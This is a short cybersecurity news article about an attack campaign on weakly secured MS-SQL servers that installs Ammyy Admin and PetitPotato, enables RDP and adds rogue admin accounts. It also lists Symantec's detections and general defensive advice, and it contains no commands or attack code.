27th April 2025, Kathmandu
In a newly uncovered cyberattack campaign, hackers are targeting poorly managed Microsoft SQL (MS-SQL) servers to deploy Ammyy Admin and PetitPotato malware, posing a serious threat to organizations worldwide.
MS-SQL Server Vulnerabilities Exploited
Cybersecurity researchers have revealed that attackers are exploiting server vulnerabilities to gain unauthorized access, perform reconnaissance, and establish remote control over compromised systems.
New Threat Campaign Targets Vulnerable MS-SQL Servers
The campaign begins with attackers scanning for misconfigured or unpatched MS-SQL servers, taking advantage of weak credentials and known vulnerabilities. Once inside the system, they execute commands to gather critical system information, mapping out the infrastructure for further exploitation.
Using tools like WGet, attackers download and install malicious payloads, notably:
- Ammyy Admin: A legitimate remote desktop software often abused by hackers for remote access.
- PetitPotato: A stealthy malware specializing in privilege escalation, allowing attackers to gain elevated access within the system.
- These malware installations enable persistent control over the server, setting the stage for deeper penetration into an organization’s network.
- Maintaining Persistent Access Through RDP and Rogue Accounts
- Beyond initial access, attackers are taking additional steps to secure long-term control over compromised environments. Key strategies include:
- Enabling Remote Desktop Protocol (RDP), even if it was previously disabled, creates a backdoor.
- Creating new administrative accounts with elevated privileges to remain undetected.
This multi-layered attack strategy ensures that even if organizations detect and close initial vulnerabilities, the attackers maintain alternative access points for future malicious activities, such as data theft, ransomware deployment, or network disruption.
- Symantec’s Response and Protection Measures
- Symantec has swiftly responded by offering protections across multiple layers:
- File-based detections: Hacktool.Gen, Hacktool.Porttran, Trojan.Gen.MBT and WS.Malware.1.
- Machine-learning-based detections: Heur.AdvML.A!300, Heur.AdvML.B, Heur.AdvML.B!200, and others.
- Web-based protections: Blocking malicious domains and IP addresses using WebPulse-enabled categories.
- Endpoint protection: VMware Carbon Black Cloud blocks known and suspect programs through strict policy enforcement.
Symantec recommends enforcing strict execution blocking, enabling cloud scan delays, and combining reputation-based protection with real-time threat intelligence for optimal security.
How Organizations Can Protect Against These Attacks?
This emerging threat is a wake-up call for businesses relying on database servers like MS-SQL. To mitigate risks, organizations must:
- Regularly patch and update all servers and applications.
- Enforce strong, multi-factor authentication on all remote and administrative access points.
- Disable unnecessary services such as RDP unless needed.
- Monitor account creation and look for suspicious administrative behavior.
- Adopt a multi-layered security approach that includes endpoint detection, behavioral analytics, and continuous network monitoring.
In an era where cybercriminals are constantly refining their tactics, proactive defense, continuous vigilance, and a robust security posture are critical to safeguarding sensitive infrastructure.
For more: MS-SQL Server Vulnerabilities Exploited